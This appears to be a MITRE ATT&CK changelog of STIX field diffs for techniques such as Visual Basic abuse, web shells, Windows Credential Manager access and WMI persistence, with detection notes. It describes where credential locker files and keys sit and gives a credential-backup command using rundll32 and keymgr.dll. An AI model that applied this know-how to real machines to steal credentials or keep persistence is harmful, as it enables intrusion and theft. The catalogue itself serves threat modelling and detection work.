| description | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking ) |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Default VBS macros Blocking ', 'description': 'Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805'} | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'User'] | |
| external_references | CAPEC-650 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 13:46:47.993000+00:00 | 2022-10-19 20:11:07.800000+00:00 |
| description | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) | Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) |
| external_references[1]['source_name'] | capec | NSA Cyber Mitigating Web Shells |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/650.html | https://github.com/nsacyber/Mitigating-Web-Shells |
| external_references[2]['source_name'] | Lee 2013 | volexity_0day_sophos_FW |
| external_references[2]['description'] | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| external_references[3]['source_name'] | NSA Cyber Mitigating Web Shells | Lee 2013 |
| external_references[3]['description'] | NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021. | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. |
| external_references[3]['url'] | https://github.com/nsacyber/Mitigating-Web-Shells | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html |
| x_mitre_data_sources[0] | File: File Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Flow | File: File Creation |
| x_mitre_data_sources[5] | Application Log: Application Log Content | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/650.html', 'external_id': 'CAPEC-650'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-29 21:00:18.973000+00:00 | 2022-10-21 15:46:55.929000+00:00 |
| description | Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) |
| external_references[1]['source_name'] | Microsoft Credential Manager store | Malwarebytes The Windows Vault |
| external_references[1]['description'] | Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020. | Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store | https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ |
| external_references[2]['source_name'] | Microsoft Credential Locker | Delpy Mimikatz Crendential Manager |
| external_references[2]['description'] | Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020. | Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN | https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials |
| external_references[3]['source_name'] | passcape Windows Vault | Microsoft Credential Locker |
| external_references[3]['description'] | Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020. | Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020. |
| external_references[3]['url'] | https://www.passcape.com/windows_password_recovery_vault_explorer | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN |
| external_references[4]['source_name'] | Malwarebytes The Windows Vault | Microsoft Credential Manager store |
| external_references[4]['description'] | Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020. | Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020. |
| external_references[4]['url'] | https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store |
| external_references[6]['source_name'] | Delpy Mimikatz Crendential Manager | passcape Windows Vault |
| external_references[6]['description'] | Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020. | Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020. |
| external_references[6]['url'] | https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials | https://www.passcape.com/windows_password_recovery_vault_explorer |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Access |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Access | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Uriel Kosayev | |
| x_mitre_contributors | Vadim Khrykov |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:58:07.715000+00:00 | 2022-04-20 16:25:21.348000+00:00 |
| description | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) |
| external_references[1]['source_name'] | MSDN WMI | FireEye WMI 2015 |
| external_references[1]['description'] | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. |
| external_references[1]['url'] | https://msdn.microsoft.com/en-us/library/aa394582.aspx | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
| external_references[2]['source_name'] | FireEye WMI 2015 | FireEye WMI SANS 2015 |
| external_references[2]['description'] | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
| external_references[3]['source_name'] | FireEye WMI SANS 2015 | MSDN WMI |
| external_references[3]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://msdn.microsoft.com/en-us/library/aa394582.aspx |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:11:13.719000+00:00 | 2022-04-20 17:01:37.760000+00:00 |
| description | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. |
| external_references[1]['source_name'] | Mandiant M-Trends 2015 | FireEye WMI 2015 |
| external_references[1]['description'] | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf |
| external_references[2]['source_name'] | FireEye WMI SANS 2015 | Dell WMI Persistence |
| external_references[2]['description'] | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. | Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf | https://www.secureworks.com/blog/wmi-persistence |
| external_references[3]['source_name'] | FireEye WMI 2015 | FireEye WMI SANS 2015 |
| external_references[3]['description'] | Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. | Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf |
| external_references[4]['source_name'] | Dell WMI Persistence | Medium Detecting WMI Persistence |
| external_references[4]['description'] | Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. | French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019. |
| external_references[4]['url'] | https://www.secureworks.com/blog/wmi-persistence | https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 |
| external_references[5]['source_name'] | Microsoft MOF May 2018 | Elastic - Hunting for Persistence Part 1 |
| external_references[5]['description'] | Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020. | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 |
| external_references[6]['source_name'] | TechNet Autoruns | Mandiant M-Trends 2015 |
| external_references[6]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016. |
| external_references[6]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf |
| external_references[7]['source_name'] | Medium Detecting WMI Persistence | Microsoft Register-WmiEvent |
| external_references[7]['description'] | French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019. | Microsoft. (n.d.). Retrieved January 24, 2020. |
| external_references[7]['url'] | https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 |
| external_references[8]['source_name'] | Elastic - Hunting for Persistence Part 1 | TechNet Autoruns |
| external_references[8]['description'] | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[8]['url'] | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[9]['source_name'] | Microsoft Register-WmiEvent | Microsoft MOF May 2018 |
| external_references[9]['description'] | Microsoft. (n.d.). Retrieved January 24, 2020. | Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020. |
| external_references[9]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 | https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- |
| x_mitre_detection | Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). |
